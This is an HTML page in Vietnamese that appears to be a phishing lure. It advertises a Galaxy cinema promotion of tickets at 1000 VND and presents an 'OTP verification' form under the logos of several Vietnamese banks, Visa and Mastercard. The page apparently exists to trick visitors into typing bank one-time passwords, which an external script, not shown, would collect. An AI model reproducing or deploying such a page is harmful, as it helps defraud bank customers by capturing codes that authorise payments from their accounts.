<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Chương trình khuyến mãi hàng tháng của galaxy</title>
    <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
    <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/styles.css">
    <link rel="stylesheet" type="text/css" href="assets/css/demo.css">
</head>

<body>
	<center>
    <div class="container-fluid">
        <header>
            <div class="limiter">
                <h3>Khuyến mãi bất ngờ chỉ 1000 vnđ / vé xem phim</h3>
            </div>
        </header>
        <div class="creditCardForm">
            <div class="heading">
                <h1>Xác thực OTP</h1>
            </div>
            <div class="payment">
                <form>
                    <div class="form-group" id="owner">
                    	<center>
                        <label for="owner">Mã số OTP</label>
                        <input type="number" required="required" class="form-control" id="owner">
                        </center>
                    </div>
                    <div class="form-group" id="pay-now">
                        <button type="submit" class="btn btn-default" id="confirm-purchase">Xác thực</button>
                    </div>
                    <div class="form-group" id="credit_cards">
                        <img src="assets/images/vtb.jpg" id="vtb">
                        <img src="assets/images/vcb.jpg" id="vcb">
                        <img src="assets/images/acb.png" id="acb">
                        <img src="assets/images/visa.jpg" id="visa">
                        <img src="assets/images/mastercard.jpg" id="mastercard">
                    </div>
                </form>
            </div>
        </div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <script src="assets/js/jquery.payform.min.js" charset="utf-8"></script>
    <script src="assets/js/script-otp.js"></script>
    </center>
</body>

</html>
